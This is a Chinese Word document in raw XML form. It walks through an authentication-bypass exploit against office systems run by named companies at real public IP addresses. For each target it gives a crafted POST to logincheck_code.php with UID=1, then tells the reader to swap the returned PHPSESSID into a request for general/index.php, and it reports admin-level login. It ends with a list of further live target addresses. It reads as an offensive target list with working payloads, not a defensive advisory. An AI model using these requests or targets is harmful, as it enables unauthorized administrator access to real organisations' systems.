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10B2ED7" w14:textId="4E1CD248" w:rsidR="001B7731" w:rsidRPr="00DD619C" w:rsidRDefault="00DD619C" w:rsidP="00DD619C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>青山控股集团有限公司青山网络智能办公系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E884D" w14:textId="356847D2" w:rsidR="008C3132" w:rsidRDefault="001B7731">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1网站首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E25AEE" w14:textId="765A8703" w:rsidR="001B7731" w:rsidRDefault="00DD619C">
      <w:r w:rsidRPr="00DD619C">
        <w:t>http://221.12.145.26:81/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD619C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09FA6E69" wp14:editId="0B9F8CFC">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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57E3C" w14:textId="0ABA821D" w:rsidR="007116C8" w:rsidRDefault="007116C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2抓包构造</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15AC87B1" w14:textId="77777777" w:rsidR="00DD619C" w:rsidRDefault="00DD619C" w:rsidP="00DD619C">
      <w:r>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logincheck_code.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DE514B" w14:textId="77777777" w:rsidR="00DD619C" w:rsidRDefault="00DD619C" w:rsidP="00DD619C">
      <w:r>
        <w:t>Host: 221.12.145.26:81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E1625D" w14:textId="77777777" w:rsidR="00DD619C" w:rsidRDefault="00DD619C" w:rsidP="00DD619C">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06878BDD" w14:textId="77777777" w:rsidR="00DD619C" w:rsidRDefault="00DD619C" w:rsidP="00DD619C">
      <w:r>
        <w:t>Content-Length: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190D5D5A" w14:textId="77777777" w:rsidR="00DD619C" w:rsidRDefault="00DD619C" w:rsidP="00DD619C">
      <w:r>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30C304C9" w14:textId="77777777" w:rsidR="00DD619C" w:rsidRDefault="00DD619C" w:rsidP="00DD619C">
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="449B6A9C" w14:textId="77777777" w:rsidR="00DD619C" w:rsidRDefault="00DD619C" w:rsidP="00DD619C"/>
    <w:p w14:paraId="55C9DF15" w14:textId="5A67B381" w:rsidR="007116C8" w:rsidRDefault="00DD619C" w:rsidP="00DD619C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>UID=1</w:t>
      </w:r>
      <w:r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575E2F2F" wp14:editId="00348FCD">
            <wp:extent cx="5274310" cy="366077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6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209FB" w14:textId="5C7A0643" w:rsidR="007116C8" w:rsidRDefault="007116C8" w:rsidP="007116C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录下</w:t>
      </w:r>
      <w:r>
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA0F6C" w14:textId="1E026218" w:rsidR="007116C8" w:rsidRDefault="007116C8" w:rsidP="007116C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE33EE" w14:textId="5B9265C4" w:rsidR="007116C8" w:rsidRDefault="00DD619C" w:rsidP="007116C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD619C">
        <w:t>http://221.12.145.26:81/</w:t>
      </w:r>
      <w:r w:rsidR="007116C8">
        <w:t>general/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB65642" w14:textId="6BAB199C" w:rsidR="007116C8" w:rsidRDefault="007116C8" w:rsidP="007116C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换刚才返回的</w:t>
      </w:r>
      <w:r>
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2CCE9" w14:textId="38F4439B" w:rsidR="007116C8" w:rsidRDefault="00DD619C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E955836" wp14:editId="6B633865">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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26A8D" w14:textId="74CEE6E6" w:rsidR="00DD619C" w:rsidRDefault="00DD619C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可成功登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC6F758" w14:textId="4872BEF8" w:rsidR="007116C8" w:rsidRDefault="00DD619C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75151AA4" wp14:editId="7F4298FE">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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819D3" w14:textId="1F168B35" w:rsidR="007116C8" w:rsidRDefault="00DD619C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DD373" w14:textId="7748BD87" w:rsidR="007116C8" w:rsidRDefault="00697018" w:rsidP="00697018">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宏润化工网络智能办公系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9BED76" w14:textId="31CCEF67" w:rsidR="00697018" w:rsidRPr="00697018" w:rsidRDefault="00697018" w:rsidP="00697018">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293E4F9D" w14:textId="58740DF8" w:rsidR="007116C8" w:rsidRDefault="00697018">
      <w:r w:rsidRPr="00697018">
        <w:t>http://61.182.116.98:8088/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30714F39" w14:textId="7CFC636F" w:rsidR="007116C8" w:rsidRDefault="00697018">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797F9DDF" wp14:editId="36A97C69">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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76011" w14:textId="77777777" w:rsidR="00697018" w:rsidRDefault="00697018" w:rsidP="00697018">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2抓包构造</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73CB9BFC" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logincheck_code.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652BF96C" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:t>Host: 61.182.116.98:8088</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630C8D35" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73921673" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:t>Content-Length: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46741EB5" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FCAD301" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="530DB19E" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8"/>
    <w:p w14:paraId="06EA7F96" w14:textId="6D2D4CD8" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:t>UID=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE9F2E0" w14:textId="01300296" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37553939" wp14:editId="408AA6B1">
            <wp:extent cx="5274310" cy="366077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6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D77E6" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录下</w:t>
      </w:r>
      <w:r>
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D6384" w14:textId="77777777" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632FC6E9" w14:textId="256D7CC7" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD619C">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00D341B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>61.182.116.98:8088</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD619C">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>general/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="29DFF096" w14:textId="7458B189" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换刚才返回的</w:t>
      </w:r>
      <w:r>
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB9671F" w14:textId="099FCD68" w:rsidR="007116C8" w:rsidRDefault="00697018" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00DB63F3" wp14:editId="633D4B49">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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7D357" w14:textId="1E06814C" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可成功登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35E9DB" w14:textId="7A9B0996" w:rsidR="007116C8" w:rsidRDefault="00697018">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E5F013" wp14:editId="640C402B">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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BBC8D" w14:textId="757F1238" w:rsidR="00D341B8" w:rsidRDefault="00D341B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EAED80" w14:textId="5E01AB42" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D341B8">
        <w:t>成都棠湖屋业发展有限公司</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113E8A9" w14:textId="77B487E4" w:rsidR="00D341B8" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE3A39" w14:textId="03EC64F6" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://171.221.203.78:88/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD794B3" w14:textId="6E18460C" w:rsidR="00D341B8" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34443099" wp14:editId="6EA0CAA9">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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62495" w14:textId="47A75A20" w:rsidR="00D341B8" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包构建</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7983A09B" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:r>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logincheck_code.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B560CE" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:r>
        <w:t>Host: 171.221.203.78:88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F9A79" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE5F36A" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:r>
        <w:t>Content-Length: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B81315" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:r>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EC0E3D8" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58F1BFCA" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5"/>
    <w:p w14:paraId="7A3969BE" w14:textId="4D579EEB" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:r>
        <w:t>UID=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5907E" w14:textId="499AEF7F" w:rsidR="00D341B8" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57E2B8B9" wp14:editId="6EE4B53F">
            <wp:extent cx="5274310" cy="366077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6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035AE" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录下</w:t>
      </w:r>
      <w:r>
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70784B58" w14:textId="77777777" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF67FA" w14:textId="7D045265" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD619C">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00D341B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E373B5">
        <w:t>171.221.203.78:88/</w:t>
      </w:r>
      <w:r>
        <w:t>general/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7AD2A200" w14:textId="29D9F117" w:rsidR="00D341B8" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换刚才返回的</w:t>
      </w:r>
      <w:r>
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295BEA93" w14:textId="00915575" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6288096C" wp14:editId="2016AA95">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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9DAEE" w14:textId="3C650471" w:rsidR="00D341B8" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可成功登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A3B58" w14:textId="6F20485B" w:rsidR="00D341B8" w:rsidRDefault="00D341B8" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4484AD97" wp14:editId="12E55F7B">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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A8BD6" w14:textId="1B1848C1" w:rsidR="00D341B8" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DABD3F5" w14:textId="63113F27" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00E373B5">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27B0B65A" w14:textId="2E1A7B00" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://36.7.140.140:8888/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2723B2" w14:textId="2C3D5A72" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://113.106.221.175:8030/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D962D39" w14:textId="73DA4E4A" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://111.204.16.10:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D31C667" w14:textId="392765F3" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://58.221.80.30:81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791FF70E" w14:textId="08081557" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://58.221.80.30:81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FD3AB" w14:textId="0B7AFB51" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://124.88.210.76:888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CF5E4" w14:textId="741602EC" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://116.255.255.165:800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0B75A9" w14:textId="0B64C1C7" w:rsidR="00E373B5" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E373B5">
        <w:t>http://14.116.160.108:81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03435600" w14:textId="3496A0AC" w:rsidR="00D341B8" w:rsidRDefault="00E373B5" w:rsidP="00D341B8">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00CF2EE7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://58.17.185.178:8099</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="042D9C44" w14:textId="3E319DBB" w:rsidR="00E373B5" w:rsidRDefault="00BA40DD" w:rsidP="00D341B8">
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00CF2EE7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://118.112.183.47:8800</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="293BAD0D" w14:textId="5CD86135" w:rsidR="00BA40DD" w:rsidRPr="00D341B8" w:rsidRDefault="00BA40DD" w:rsidP="00D341B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA40DD">
        <w:t>http://116.211.7.162:9090</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BA40DD" w:rsidRPr="00D341B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oNotDisplayPageBoundarie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F4D76"/>
    <w:rsid w:val="000E1D6A"/>
    <w:rsid w:val="001B7731"/>
    <w:rsid w:val="00403BF3"/>
    <w:rsid w:val="00697018"/>
    <w:rsid w:val="006F4D76"/>
    <w:rsid w:val="007116C8"/>
    <w:rsid w:val="008C3132"/>
    <w:rsid w:val="00BA40DD"/>
    <w:rsid w:val="00D341B8"/>
    <w:rsid w:val="00DD619C"/>
    <w:rsid w:val="00E373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E61F235"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{240C99F3-21CA-48FC-BBAE-36E153F0B79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1B7731"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
